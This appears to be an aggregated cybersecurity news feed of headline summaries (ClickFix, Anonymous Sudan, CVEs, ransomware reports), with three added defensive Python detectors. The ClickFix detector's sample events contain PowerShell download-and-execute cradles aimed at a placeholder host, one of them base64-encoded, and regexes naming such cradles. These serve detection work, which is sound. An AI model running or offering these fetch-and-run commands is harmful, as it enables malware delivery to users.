Category: Attack Feeds

The Ultimate DSPM Guide: Webinar on Building a Strong Data Security Posture – [email protected] (The Hacker News)

– Picture your company’s data as a vast, complex jigsaw puzzle—scattered across clouds, devices, and networks. Some pieces are hidden, some misplaced, and others might even be missing entirely. Keeping your data secure in today’s fast-evolving landscape can feel like an impossible challenge. But there’s a game-changing solution: Data Security Posture Management (DSPM). Think of it as a high-tech, ...

Beware: Fake Google Meet Pages Deliver Infostealers in Ongoing ClickFix Campaign – [email protected] (The Hacker News)

– Threat actors are leveraging fake Google Meet web pages as part of an ongoing malware campaign dubbed ClickFix to deliver infostealers targeting Windows and macOS systems. “This tactic involves displaying fake error messages in web browsers to deceive users into copying and executing a given malicious PowerShell code, finally infecting their systems,” French cybersecurity company Sekoia said in ...
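
The ClickFix chain summarized above ends with the victim pasting a PowerShell one-liner into the Run dialog or a terminal, which leaves a distinctive process-creation trail. The block below is an added example, not Sekoia’s detection content or anything from the article: it scores Sysmon-style process-creation records, assuming explorer.exe is the parent when the Win+R Run dialog is used, and treats a download cradle, -WindowStyle Hidden, -ExecutionPolicy Bypass or an -EncodedCommand payload (which it decodes before matching) as the signals. The records, field names, weights and threshold are constructed assumptions; the macOS side of the campaign would need the analogous Terminal/curl check, which is not shown.

```python
"""Flag process-creation events that look like a ClickFix "paste and run" chain.

Added example, not vendor detection content.  Assumptions: the victim pastes the
lure's one-liner into the Win+R Run dialog, so explorer.exe is the parent of
powershell.exe, and the pasted command carries a download cradle plus, usually,
window-hiding, policy-bypass or -EncodedCommand switches.  Field names follow
Sysmon event 1; the records below are constructed, not real telemetry.
"""
import base64
import binascii
import re

DOWNLOAD = re.compile(
    r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile"
    r"|net\.webclient|start-bitstransfer)\b", re.I)
EXECUTE = re.compile(r"\b(?:iex|invoke-expression)\b", re.I)
HIDDEN = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
BYPASS = re.compile(r"-(?:ep|executionpolicy)\s+bypass", re.I)
ENCODED = re.compile(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", re.I)


def _basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def _expand_encoded(cmd: str) -> str:
    """Append the decoded -EncodedCommand payload (UTF-16LE) so the cradle
    patterns can see what the encoded form hides."""
    m = ENCODED.search(cmd)
    if not m:
        return cmd
    try:
        return cmd + " " + base64.b64decode(m.group(1)).decode("utf-16-le", "ignore")
    except (binascii.Error, ValueError):
        return cmd


def score_event(ev: dict) -> int:
    """Heuristic score; the weights are assumptions to tune on your own telemetry."""
    if _basename(ev.get("Image", "")) not in {"powershell.exe", "pwsh.exe"}:
        return 0
    cmd = _expand_encoded(ev.get("CommandLine", ""))
    score = 0
    if _basename(ev.get("ParentImage", "")) == "explorer.exe":
        score += 2  # launched from the shell / Run dialog, as a pasted lure would be
    if DOWNLOAD.search(cmd):
        score += 2
    if EXECUTE.search(cmd):
        score += 1
    if HIDDEN.search(cmd):
        score += 1
    if BYPASS.search(cmd):
        score += 1
    if ENCODED.search(cmd):
        score += 2
    return score


def find_clickfix_candidates(events, threshold: int = 4):
    """EventIds whose score reaches the (assumed) alerting threshold."""
    return [ev["EventId"] for ev in events if score_event(ev) >= threshold]


# Constructed sample records.  Event 1 is the pasted Run-dialog cradle, event 5
# the same cradle hidden behind -Enc and launched from Word; 2, 3 and 4 are benign.
_PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
_ENC = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
    .encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"EventId": 1, "ParentImage": r"C:\Windows\explorer.exe", "Image": _PS,
     "CommandLine": "powershell -w hidden -ep bypass -c \"iex (iwr "
                    "'http://example.invalid/fix.ps1' -UseBasicParsing)\""},
    {"EventId": 2, "ParentImage": r"C:\Windows\System32\cmd.exe", "Image": _PS,
     "CommandLine": "powershell -NoProfile -Command Get-Process"},
    {"EventId": 3, "ParentImage": r"C:\Windows\explorer.exe", "Image": _PS,
     "CommandLine": "powershell.exe"},
    {"EventId": 4, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe"},
    {"EventId": 5, "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": _PS, "CommandLine": f"powershell.exe -NoP -NonI -W Hidden -Enc {_ENC}"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev["EventId"], score_event(ev))
    print("candidates:", find_clickfix_candidates(SAMPLE_EVENTS))
```

A user who simply opens PowerShell from the Start menu (event 3) also has explorer.exe as parent, which is why parentage alone stays below the threshold and the cradle and stealth switches carry most of the weight.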

Recapping Raid Forums: The Place Where Data Was Sold to the Highest Bidder – [email protected]

– The content of this post is solely the responsibility of the author. LevelBlue does not adopt or endorse any of the views, positions, or information provided by the author in this article. From stolen personal data to entire corporate databases, Raid Forums was a digital black market where the most valuable commodities weren’t physical goods but sensitive information....

Microsoft Reveals macOS Vulnerability that Bypasses Privacy Controls in Safari Browser – [email protected] (The Hacker News)

– Microsoft has disclosed details about a now-patched security flaw in Apple’s Transparency, Consent, and Control (TCC) framework in macOS that has likely come under exploitation to get around a user’s privacy preferences and access data. The shortcoming, codenamed HM Surf by the tech giant, is tracked as CVE-2024-44133. It was addressed by Apple as part of macOS Sequoia 15...

A glimmer of good news on the ransomware front, as encryption rates plummet – Graham Cluley

– No-one would be bold enough to say that the ransomware problem is receding, but a newly-published report by Microsoft does deliver a sliver of encouraging news amongst the gloom. And boy do we need some good news – amid reports that 389 US-based healthcare institutions were hit by ransomware last year – more than one every single day. Read...

Alabama man arrested for role in SEC Twitter account hijacking – djohnson

– A 25-year-old Alabama man has been arrested and charged with hacking into the Securities and Exchange Commission’s Twitter/X account earlier this year and making fake regulatory posts that artificially inflated the price of Bitcoin by more than $1,000 per unit. Eric Council Jr., a resident of Athens, Ala., was arrested Thursday morning and charged with aggravated identity theft...

Russian RomCom Attacks Target Ukrainian Government with New SingleCamper RAT Variant – [email protected] (The Hacker News)

– The Russian threat actor known as RomCom has been linked to a new wave of cyber attacks aimed at Ukrainian government agencies and unknown Polish entities since at least late 2023. The intrusions are characterized by the use of a variant of the RomCom RAT dubbed SingleCamper (aka SnipBot or RomCom 5.0), said Cisco Talos, which is monitoring the...

Brazil’s Federal Police arrest alleged National Public Data hacker – Greg Otto

– The Federal Police of Brazil on Wednesday arrested a person allegedly responsible for a series of audacious data breaches targeting large international companies and U.S. government entities. The suspect, who is known in the cybercrime underground as USDoD or EquationCorp, is allegedly the person responsible for a breach of the online background check and fraud prevention service National...

Researchers Uncover Cicada3301 Ransomware Operations and Its Affiliate Program – [email protected] (The Hacker News)

– Cybersecurity researchers have gleaned additional insights into a nascent ransomware-as-a-service (RaaS) called Cicada3301 after successfully gaining access to the group’s affiliate panel on the dark web. Singapore-headquartered Group-IB said it contacted the threat actor behind the Cicada3301 persona on the RAMP cybercrime forum via the Tox messaging service after the latter put out an...

Sudanese Brothers Arrested in ‘AnonSudan’ Takedown – BrianKrebs

– The U.S. government on Wednesday announced the arrest and charging of two Sudanese brothers accused of running Anonymous Sudan (a.k.a. AnonSudan), a cybercrime business known for launching powerful distributed denial-of-service (DDoS) attacks against a range of targets, including dozens of hospitals, news websites and cloud providers. The younger brother is facing charges that could land him life in...

SideWinder APT Strikes Middle East and Africa With Stealthy Multi-Stage Attack – [email protected] (The Hacker News)

– An advanced persistent threat (APT) actor with suspected ties to India has sprung forth with a flurry of attacks against high-profile entities and strategic infrastructures in the Middle East and Africa. The activity has been attributed to a group tracked as SideWinder, which is also known as APT-C-17, Baby Elephant, Hardcore Nationalist, Leafperforator, Rattlesnake, Razor Tiger, and T-APT-04. ...

5 Ways to Reduce SaaS Security Risks – [email protected] (The Hacker News)

– As technology adoption has shifted to be employee-led, just in time, and from any location or device, IT and security teams have found themselves contending with an ever-sprawling SaaS attack surface, much of which is often unknown or unmanaged. This greatly increases the risk of identity-based threats, and according to a recent report from CrowdStrike, 80% of breaches today...

Pitfalls of Cloud Sprawl and How to Avoid Them – [email protected]

– Cloud computing has become a boon to organizations due to its flexibility, scalability, and cost-effectiveness. However, without proper oversight, it evolves into an untidy collection of...

U.S. Charges Two Sudanese Brothers for Record 35,000 DDoS Attacks – [email protected] (The Hacker News)

– Federal prosecutors in the U.S. have charged two Sudanese brothers with running a distributed denial-of-service (DDoS) botnet for hire that conducted a record 35,000 DDoS attacks in a single year, including those that targeted Microsoft’s services in June 2023. The attacks, which were facilitated by Anonymous Sudan’s “powerful DDoS tool,” singled out critical infrastructure, corporate networks, ...

Critical Kubernetes Image Builder Vulnerability Exposes Nodes to Root Access Risk – [email protected] (The Hacker News)

– A critical security flaw has been disclosed in the Kubernetes Image Builder that, if successfully exploited, could be abused to gain root access under certain circumstances. The vulnerability, tracked as CVE-2024-9486 (CVSS score: 9.8), has been addressed in version 0.1.38. The project maintainers acknowledged Nicolai Rybnikar for discovering and reporting the vulnerability. “A security issue...

Smashing Security podcast #389: WordPress vs WP Engine, and the Internet Archive is down – Graham Cluley

– WordPress’s emperor, Matt Mullenweg, demands a hefty tribute from WP Engine, and a battle erupts, leaving millions of websites hanging in the balance. Meanwhile, the Internet Archive, a digital library preserving our online history, is under siege from hackers. All this and more is discussed in the latest edition of the “Smashing Security” podcast by cybersecurity veterans Graham Cluley...

Pyongyang on the payroll? Signs that your company has hired a North Korean IT worker – djohnson

– If your remote employee insists on using their own devices, won’t show up on webcam and frequently changes their payment services, you may have accidentally hired a North Korean operative. Those are some of the tactics wielded by the actors behind what Secureworks refers to as Nickel Tapestry, a group known for planting fake IT workers at Western...

Alleged Anonymous Sudan leaders charged, prolific gang’s tool disabled – Tim Starks

– A federal grand jury unsealed an indictment Wednesday against two Sudanese brothers allegedly behind Anonymous Sudan, a cybercriminal outfit responsible for tens of thousands of attacks designed to knock websites and services offline. Authorities also unsealed a criminal complaint and announced they had disabled the group’s powerful tool for conducting attacks. Ahmed Salah Yousif Omer, 22, and Alaa...

GitHub patches critical vulnerability in its Enterprise Servers – Christian Vasquez

– GitHub’s latest Enterprise Server update fixes a critical vulnerability that allows authentication bypass for on-premise deployments, according to the company. The bug — CVE-2024-9487 — impacts GitHub’s enterprise product and does not affect its software-as-a-service products, according to the company’s release. The Microsoft-owned company said the bug, which is a 9.5 on the CVSS scale, would allow hackers...

Iranian hackers are going after critical infrastructure sector passwords, agencies caution – Tim Starks

– Iranian hackers are aggressively trying to crack passwords in the health care, government, information technology, energy and engineering sectors, an advisory from U.S., Canadian and Australian cyber agencies said Wednesday. The “brute force” attacks — which take a variety of forms — date to October of last year, according to the FBI, the Cybersecurity and Infrastructure Security Agency,...
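
The advisory summarized above describes brute-force activity that “takes a variety of forms”; the form most worth a dedicated detection is password spraying, one or two guesses against many accounts from one source so that no single account trips a lockout. The following is an added example, not part of the CyberScoop article or the joint advisory: it parses a constructed, hypothetical auth-log format, flags any source whose failures cover many distinct accounts inside a time window, and then looks for a later success from that source against one of the sprayed accounts. The log format, field names and thresholds are assumptions; the sample also includes a slow one-account-per-hour spray to show what a short window misses.

```python
"""Password-spray detection over authentication logs.

Added example; the log format is constructed and hypothetical, and the
thresholds are assumptions to tune against real lockout policies and traffic.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

LINE = re.compile(
    r"^(?P<ts>\S+) auth (?P<result>FAIL|OK) user=(?P<user>\S+) src=(?P<src>\S+)$"
)

# Constructed sample.  10.0.0.5 sprays six accounts in under a minute and later
# logs in as one of them; 192.0.2.10 is a user mistyping their own password;
# 198.51.100.7 stays below the account threshold; 203.0.113.9 is a "low and
# slow" spray, one account per hour, that a 10-minute window will not catch.
SAMPLE_AUTH_LOG = """
2024-10-16T03:00:05 auth FAIL user=alice src=10.0.0.5
2024-10-16T03:00:09 auth FAIL user=bob src=10.0.0.5
2024-10-16T03:00:14 auth FAIL user=carol src=10.0.0.5
2024-10-16T03:00:20 auth FAIL user=dave src=10.0.0.5
2024-10-16T03:00:27 auth FAIL user=erin src=10.0.0.5
2024-10-16T03:00:33 auth FAIL user=frank src=10.0.0.5
2024-10-16T03:02:41 auth OK user=erin src=10.0.0.5
2024-10-16T03:01:00 auth FAIL user=gina src=192.0.2.10
2024-10-16T03:01:08 auth FAIL user=gina src=192.0.2.10
2024-10-16T03:01:15 auth FAIL user=gina src=192.0.2.10
2024-10-16T03:01:30 auth OK user=gina src=192.0.2.10
2024-10-16T03:05:00 auth FAIL user=hank src=198.51.100.7
2024-10-16T03:05:02 auth FAIL user=ivy src=198.51.100.7
2024-10-16T00:00:00 auth FAIL user=u1 src=203.0.113.9
2024-10-16T01:00:00 auth FAIL user=u2 src=203.0.113.9
2024-10-16T02:00:00 auth FAIL user=u3 src=203.0.113.9
2024-10-16T03:00:00 auth FAIL user=u4 src=203.0.113.9
2024-10-16T04:00:00 auth FAIL user=u5 src=203.0.113.9
"""


def parse_auth_log(lines):
    """Parse matching lines into dicts; blank or foreign lines are skipped
    (count them in production so a format change does not silently blind you)."""
    events = []
    for line in lines:
        m = LINE.match(line.strip())
        if not m:
            continue
        ev = m.groupdict()
        ev["ts"] = datetime.fromisoformat(ev["ts"])
        events.append(ev)
    return events


def detect_password_spray(events, window_minutes=10, min_users=5):
    """Return {src: set_of_sprayed_users} for sources whose failures span at
    least min_users distinct accounts inside any window_minutes-long window."""
    window = timedelta(minutes=window_minutes)
    fails = defaultdict(list)
    for ev in events:
        if ev["result"] == "FAIL":
            fails[ev["src"]].append(ev)
    findings = {}
    for src, evs in fails.items():
        evs.sort(key=lambda e: e["ts"])
        start = 0
        for end in range(len(evs)):  # sliding window over this source's failures
            while evs[end]["ts"] - evs[start]["ts"] > window:
                start += 1
            users = {e["user"] for e in evs[start:end + 1]}
            if len(users) >= min_users:
                findings[src] = findings.get(src, set()) | users
    return findings


def successes_after_spray(events, findings):
    """A spraying source that then authenticates as a sprayed account is the
    event worth paging on: one of the guesses landed."""
    return [
        (ev["src"], ev["user"])
        for ev in events
        if ev["result"] == "OK" and ev["user"] in findings.get(ev["src"], ())
    ]


if __name__ == "__main__":
    evs = parse_auth_log(SAMPLE_AUTH_LOG.splitlines())
    found = detect_password_spray(evs)
    print("spraying sources:", found)
    print("spray followed by success:", successes_after_spray(evs, found))
    print("with a 6-hour window:", sorted(detect_password_spray(evs, window_minutes=360)))
```

Keying on the source address is the simplest grouping and the one a spray from a residential proxy pool will defeat; in that case group by the failing accounts' shared attributes (user agent, ASN, target application) instead, and keep the window long enough to see a slow spray without drowning in ordinary typos.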

Hackers Abuse EDRSilencer Tool to Bypass Security and Hide Malicious Activity – [email protected] (The Hacker News)

– Threat actors are attempting to abuse the open-source EDRSilencer tool as part of efforts to tamper endpoint detection and response (EDR) solutions and hide malicious activity. Trend Micro said it detected “threat actors attempting to integrate EDRSilencer in their attacks, repurposing it as a means of evading detection.” EDRSilencer, inspired by the NightHawk FireBlock tool from MDSec, is...

Spanish-speaking voters are in the crosshairs of disinformation agents – djohnson

– Latino and Hispanic voters are viewed as a critical, up-for-grabs bloc this election cycle, with Republican Donald Trump showing signs of making significant inroads with the groups in polling and advisers to Democrat Kamala Harris singling out those votes as key to winning battleground states like Florida, Nevada, Arizona and Pennsylvania. These voters were bombarded with Spanish-speaking mis-...

Here’s how attackers are getting around phishing defenses – Christian Vasquez

– Hackers are evading natural language processing detection capabilities used to filter out phishing attacks by adding benign text and links, according to data from Egress’ threat intelligence unit released Tuesday. Egress researchers looked at 40 attacks targeting U.S. organizations that used obfuscation techniques designed to evade anti-phishing services by using natural language processors (NLP) to send malware or...
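
The dilution technique described above works against any classifier that scores a message as a whole: appended benign text drives the share of suspicious content towards zero. The block below is an added illustration, not Egress’ data or detection logic: a toy bag-of-words scorer (the word list, window size and threshold are assumptions) that a padded message defeats, beside a windowed variant that scores the most suspicious 40-token span and is not moved by text appended elsewhere. Both messages are constructed.

```python
"""Benign-text dilution against a whole-message phishing scorer, and a windowed
scorer that resists it.

Added illustration: the word list, window size and threshold are assumptions and
the messages are constructed; none of this is Egress' data or model.
"""
import re

SUSPICIOUS = {
    "urgent", "verify", "suspended", "password", "account", "immediately",
    "confirm", "login", "expire", "invoice", "payment", "unusual",
}
TOKEN = re.compile(r"[a-z']+")

PHISH = (
    "Urgent: your account has been suspended. Verify your password immediately "
    "to confirm your login: http://secure-login.example.invalid/verify"
)
# 20 copies of a harmless sentence (280 tokens) appended after the lure, the
# way the evasive messages carried added benign text.  Constructed sample.
BENIGN_PADDING = " ".join(
    ["The quarterly newsletter highlights community events, volunteer "
     "opportunities and weather updates for the region."] * 20
)
PADDED_PHISH = PHISH + "\n\n" + BENIGN_PADDING


def tokens(text):
    return TOKEN.findall(text.lower())


def naive_score(text):
    """Share of suspicious tokens over the whole message: what dilution defeats."""
    toks = tokens(text)
    return sum(t in SUSPICIOUS for t in toks) / len(toks) if toks else 0.0


def windowed_score(text, window=40):
    """Highest suspicious-token share over any contiguous span of `window`
    tokens, so padding elsewhere in the message cannot lower the score."""
    toks = tokens(text)
    if len(toks) <= window:
        return naive_score(text)
    return max(
        sum(t in SUSPICIOUS for t in toks[i:i + window]) / window
        for i in range(len(toks) - window + 1)
    )


def classify(text, scorer=windowed_score, threshold=0.1):
    """True when the chosen scorer calls the message suspicious."""
    return scorer(text) >= threshold


if __name__ == "__main__":
    for name, msg in (("lure", PHISH), ("padded lure", PADDED_PHISH)):
        print(f"{name:12} naive={naive_score(msg):.3f} "
              f"windowed={windowed_score(msg):.3f} "
              f"flagged(naive)={classify(msg, naive_score)} "
              f"flagged(windowed)={classify(msg)}")
```

The windowed scorer only closes the specific hole of appended padding; an attacker who can interleave benign words inside the lure itself pushes the per-window share down too, so the text score should stay one signal among several (sender authentication, URL and attachment analysis) rather than the gate on its own.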

FIDO Alliance Drafts New Protocol to Simplify Passkey Transfers Across Different Platforms – [email protected] (The Hacker News)

– The FIDO Alliance said it’s working to make passkeys and other credentials easier to export across different providers and improve credential provider interoperability, as more than 12 billion online accounts become accessible with the passwordless sign-in method. To that end, the alliance said it has published a draft for a new set of specifications for secure credential exchange, ...

North Korean ScarCruft Exploits Windows Zero-Day to Spread RokRAT Malware – [email protected] (The Hacker News)

– The North Korean threat actor known as ScarCruft has been linked to the zero-day exploitation of a now-patched security flaw in Windows to infect devices with malware known as RokRAT. The vulnerability in question is CVE-2024-38178 (CVSS score: 7.5), a memory corruption bug in the Scripting Engine that could result in remote code execution when using the Edge browser...

From Misuse to Abuse: AI Risks and Attacks – [email protected] (The Hacker News)

– AI from the attacker’s perspective: See how cybercriminals are leveraging AI and exploiting its vulnerabilities to compromise systems, users, and even other AI applications. Cybercriminals and AI: The Reality vs. Hype. “AI will not replace humans in the near future. But humans who know how to use AI are going to replace those humans who don’t know how to...

5 Techniques for Collecting Cyber Threat Intelligence – [email protected] (The Hacker News)

– To defend your organization against cyber threats, you need a clear picture of the current threat landscape. This means constantly expanding your knowledge about new and ongoing threats. There are many techniques analysts can use to collect crucial cyber threat intelligence. Let’s consider five that can greatly improve your threat investigations. Pivoting on C2 IP addresses to pinpoint malware ...

Astaroth Banking Malware Resurfaces in Brazil via Spear-Phishing Attack – [email protected] (The Hacker News)

– A new spear-phishing campaign targeting Brazil has been found delivering a banking malware called Astaroth (aka Guildma) by making use of obfuscated JavaScript to slip past security guardrails. “The spear-phishing campaign’s impact has targeted various industries, with manufacturing companies, retail firms, and government agencies being the most affected,” Trend Micro said in a new analysis. ...

CISA Warns of Active Exploitation in SolarWinds Help Desk Software Vulnerability – [email protected] (The Hacker News)

– The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday added a critical security flaw impacting SolarWinds Web Help Desk (WHD) software to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation. Tracked as CVE-2024-28987 (CVSS score: 9.1), the vulnerability relates to a case of hard-coded credentials that could be abused to gain...

GitHub Patches Critical Flaw in Enterprise Server Allowing Unauthorized Instance Access – [email protected] (The Hacker News)

– GitHub has released security updates for Enterprise Server (GHES) to address multiple issues, including a critical bug that could allow unauthorized access to an instance. The vulnerability, tracked as CVE-2024-9487, carries a CVSS score of 9.5 out of a maximum of 10.0. “An attacker could bypass SAML single sign-on (SSO) authentication with the optional encrypted assertions feature, allowing...

TrickMo Banking Trojan Can Now Capture Android PINs and Unlock Patterns – [email protected] (The Hacker News)

– New variants of an Android banking trojan called TrickMo have been found to harbor previously undocumented features to steal a device’s unlock pattern or PIN. “This new addition enables the threat actor to operate on the device even while it is locked,” Zimperium security researcher Aazim Yaswant said in an analysis published last week. First spotted in the wild...

New Linux Variant of FASTCash Malware Targets Payment Switches in ATM Heists – [email protected] (The Hacker News)

– North Korean threat actors have been observed using a Linux variant of a known malware family called FASTCash to steal funds as part of a financially-motivated campaign. The malware is “installed on payment switches within compromised networks that handle card transactions for the means of facilitating the unauthorized withdrawal of cash from ATMs,” a security researcher who goes by...

New Malware Campaign Uses PureCrypter Loader to Deliver DarkVision RAT – [email protected] (The Hacker News)

– Cybersecurity researchers have disclosed a new malware campaign that leverages a malware loader named PureCrypter to deliver a commodity remote access trojan (RAT) called DarkVision RAT. The activity, observed by Zscaler ThreatLabz in July 2024, involves a multi-stage process to deliver the RAT payload. “DarkVision RAT communicates with its command-and-control (C2) server using a custom network ...

The AI Fix #20: Elon’s androids, emotional support chickens, and an AI Fix super fan – Graham Cluley

– In episode 20 of “The AI Fix”, Mark asks an AI to make a very important decision, the Nobel academy finds a bandwagon, Graham gets a new nickname, a pair of robots prove that AI can’t do humour, and our hosts find out why emotional support insects haven’t taken off. Graham introduces Mark to Optimus, the robot that can’t...

Ransomware encryption down amid surge of attacks, Microsoft says – AJ Vicens

– The number of ransomware attacks that reach the encryption stage dropped 300% over the past two years, due in large part to automatic attack disruption technologies, according to a report out Tuesday from Microsoft. The findings — which come as part of Microsoft’s fifth annual Digital Defense Report analyzing trends between June 2022 and July 2023 — come amid...

The Rise of Zero-Day Vulnerabilities: Why Traditional Security Solutions Fall Short – [email protected] (The Hacker News)

– In recent years, the number and sophistication of zero-day vulnerabilities have surged, posing a critical threat to organizations of all sizes. A zero-day vulnerability is a security flaw in software that is unknown to the vendor and remains unpatched at the time of discovery. Attackers exploit these flaws before any defensive measures can be implemented, making zero-days a potent...

From Reactive to Proactive: Shifting Your Cybersecurity Strategy – [email protected]

– Most companies have some cybersecurity protocols in place in case of a breach. They could be anything from antivirus software to spam filters. Those are considered...

Organizations can substantially lower vulnerabilities with secure-by-design practices, report finds – Christian Vasquez

– Large organizations that train developers with secure-by-design practices can reliably reduce the number of vulnerabilities introduced into software products by more than 50%, according to a new report from Secure Code Warrior. The Australia-based secure coding platform and software firm analyzed data from 600 enterprise customers over nine years to find out what improvements, if any, can be...